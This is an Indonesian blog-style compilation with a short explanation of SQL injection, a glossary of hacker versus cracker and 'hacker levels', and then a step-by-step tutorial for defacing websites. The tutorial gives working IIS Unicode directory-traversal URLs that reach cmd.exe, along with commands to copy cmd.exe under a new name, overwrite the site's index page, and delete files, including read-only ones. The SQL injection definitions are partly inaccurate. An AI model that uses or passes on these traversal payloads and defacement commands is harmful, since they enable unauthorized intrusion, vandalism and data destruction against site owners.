Pengertian SQL Injection
1) SQL injection adalah sebuah aksi hacking yang dilakukan di aplikasi client dengan cara memodifikasi perintah SQL yang ada di memori aplikasi client.
2) SQL Injection merupakan teknik mengeksploitasi web aplikasi yang didalamnya menggunakan database untuk penyimpanan data.
Sebab terjadinya SQL Injection
1) Tidak adanya penanganan terhadap karakter – karakter tanda petik satu ’ dan juga karakter double minus -- yang menyebabkan suatu aplikasi dapat disisipi dengan perintah SQL.
2) Sehingga seorang Hacker menyisipkan perintah SQL kedalam suatu parameter maupun suatu form.
Bug SQL Injection berbahaya ?
1) Teknik ini memungkinkan seseorang dapat login kedalam sistem tanpa harus memiliki account.
2) Selain itu SQL injection juga memungkinkan seseorang merubah, menghapus, maupun menambahkan data–data yang berada didalam database.
3) Bahkan yang lebih berbahaya lagi yaitu mematikan database itu sendiri, sehingga tidak bisa memberi layanan kepada web server.
Apa saja yang diperlukan untuk melakukan SQL Injection ?
1) Internet Exploler / Browser
2) PC yang terhubung internet
3) Program atau software seperti softice
semoga bermanfaat...
Nah kali ini saya akan memposting pengertian dari sebuah kata yaitu Hacker dan Cracker langsung aja ya..... :D
Hacker
Hacker adalah sebutan untuk orang atau sekelompok orang yang memberikan sumbangan bermanfaat untuk dunia jaringan dan sistem operasi, membuat program bantuan untuk dunia jaringan dan komputer.Hacker juga bisa di kategorikan perkerjaan yang dilakukan untuk mencari kelemahan suatu system dan memberikan ide atau pendapat yang bisa memperbaiki kelemahan system yang di temukannya.
Cracker
Sedangkan cracker adalah sebutan untuk orang yang mencari kelemahan system dan memasukinya untuk kepentingan pribadi dan mencari keuntungan dari system yang di masuki seperti: pencurian data, penghapusan, dan banyak yang lainnya.
Hirarki / Tingkatan Hacker
Ternyata Hacker juga mempunyai tingkatan-tingkatan, tiap tingkatan di bedakan dengan kemampuan dan ilmu yang dimiliki sang hacker :
Elite
Ciri-ciri : mengerti sistem operasi luar dalam, sanggup mengkonfigurasi & menyambungkan jaringan secara global, melakukan pemrogramman setiap harinya, effisien & trampil, menggunakan pengetahuannya dengan tepat, tidak menghancurkan data-data, dan selalu mengikuti peraturan yang ada. Tingkat Elite ini sering disebut sebagai ‘suhu’.
Semi Elite
Ciri-ciri : lebih muda dari golongan elite, mempunyai kemampuan & pengetahuan luas tentang komputer, mengerti tentang sistem operasi (termasuk lubangnya), kemampuan programnya cukup untuk mengubah program eksploit.
Developed Kiddie
Ciri-ciri : umurnya masih muda (ABG) & masih sekolah, mereka membaca tentang metoda hacking & caranya di berbagai kesempatan, mencoba berbagai sistem sampai akhirnya berhasil & memproklamirkan kemenangan ke lainnya, umumnya masih menggunakan Grafik User Interface (GUI) & baru belajar basic dari UNIX tanpa mampu menemukan lubang kelemahan baru di sistem operasi.
Script Kiddie
Ciri-ciri : seperti developed kiddie dan juga seperti Lamers, mereka hanya mempunyai pengetahuan teknis networking yang sangat minimal, tidak lepas dari GUI, hacking dilakukan menggunakan trojan untuk menakuti & menyusahkan hidup sebagian pengguna Internet.
Lammer
Ciri-ciri : tidak mempunyai pengalaman & pengetahuan tapi ingin menjadi hacker sehingga lamer sering disebut sebagai ‘wanna-be’ hacker, penggunaan komputer mereka terutama untuk main game, IRC, tukar menukar software prirate, mencuri kartu kredit, melakukan hacking dengan menggunakan software trojan, nuke & DoS, suka menyombongkan diri melalui IRC channel, dan sebagainya. Karena banyak kekurangannya untuk mencapai elite, dalam perkembangannya mereka hanya akan sampai level developed kiddie atau script kiddie saja.
semoga suka ya...
Langkah 1 : Mencari target
Mencari target dapat dilakukan dengan berbagai cara hal ini tergantung kreativitas dan sarana yang dimiliki, dalam hal ini bisa berbentuk script IRC, scanner. Sebagai dasar mengetahui OS yang digunakan server suatu site dapat diketahui dengan mencarinya pada situs http://www.netcraft.com/
Langkah 2 : Unicode
Setelah target didapat maka digunakan Unicode. Unicode itu sendiri penulis juga tidak terlalu mengetahui secara mendetail, tapi pada dasarnya Unicode menggunakan bahasa ASCII. Server yang menggunakan OS NT dengan IIS sendiri mempunyai bug yang bisa ditembus dengan Unicode dalam hal ini bila server itu belum dipatch. Unicode yang berhasil ditemukan untuk memasuki server NT sudah banyak. Dan yang bisa dicoba sebagai berikut:
http://target/_vti_bin/..%c0%af../..%c0%af../..%c0%af../winnt/system32/cmd.exe?/c+dir+c:\
http://target/scripts/..%c0%af../..%c0%af../..%c0%af../winnt/system32/cmd.exe?/c+dir+c:\
http://target/msadc/..%c0%af../..%c0%af../..%c0%af../winnt/system32/cmd.exe?/c+dir+c:\
http://target/cgi-bin/..%c0%af../..%c0%af../..%c0%af../winnt/system32/cmd.exe?/c+dir+c:\
http://target/scripts/..%255c..%255cwinnt/system32/cmd.exe?/c+dir+c:\
Bila Unicode tersebut berhasil maka akan dapat dilihat tampilan seperti berikut:
Directory of c:\
06/03/01 09:59a (DIR) InetPub
08/08/01 06:14p (DIR) WINNT
Langkah 3 :Mencari halaman depan
Saat membuka situs tersebut pada browser, kita pasti akan melihat tampilan muka dari site tersebut, perlu diperhatikan adalah file tampilan muka tersebut apa? biasanya antara lain: index.htm, index.html, default.htm, default.html. Kemudian dengan mengunakan Unicode tersebut kita mencari file tersebut letaknya dimana, biasanya di C:\inetpub\wwwroot (hal ini belum tentu). untuk mencari file tersebut dapat digunakan perintah:
/c+dir/s+c:\index.htm
Hal ini berarti perintah mencari file index.htm di dalam drive C
Untuk melihat apakah file index.htm tersebut adalah yang digunakan pada halaman depan, dipergunakan perintah :
/c+type+c:\direktory dan nama file, contoh : /c+type+c:\inetpub\wwwroot\index.htm
Setelah anda menemukan file index.htm tersebut, maka sebaiknya anda copy dulu, hal ini agar tindakan Deface kita tidak terlalu merugikan Administrator dari server situs tersebut. Sehingga nantinya Admin tersebut mempunyai backup dari file index.
perintah copy itu sendiri adalah:
/c+copy+c:\
contoh untuk pencopyan adalah:
/c+copy+c:\inetpub\wwwroot\index.htm backupindex.htm
untuk mempermudah pekerjaan dapat dilakukan pencopyan file cmd.exe yg berada di direktory c:/winnt/system32 dengan menggunakan nama anda, seperti :
/c+copy+c:\winnt\system32\cmd.exe+c:\deface.exe
hal ini berarti anda mencopy file cmd.exe ke dir c dgn nama deface.exe, sehingga untuk perintah2 selanjutnya tidak memerlukan /winnt/system32/cmd.exe?/ tapi cukup /deface.exe?/
Langkah 4 : Meng-Copy file index.htm
echo dalam dos berarti anda membuat file maka bila file index.htm yg asli anda echo berarti anda timpa dengan file index anda. Untuk perintahnya adalah:
/deface.exe?/c+echo+"deface+was+here"+>+c:\inetpub\wwwroot\index.htm
sehingga tampilan site depan telah terganti dengan tulisan
deface was here
Catatan:
Hal ini berlaku bila file index.htm tersebut dapat diecho, karena sebagian server membatasi direktory root dengan atribut read only, sehingga perintah echo index.htm akan menghasilkan :
Access Denied
Untuk membuat deface anda menjadi lebih bagus, dapat digunakan bahasa HTML dan ASCII
perintah-perintah lain :
membuat direktory = /c+mkdir+c:\
merubah nama file = /c+ren+c:\file
menghapus file = /c+del+c:\file
menghapus file Read-Only = /c+del+/R+c:\file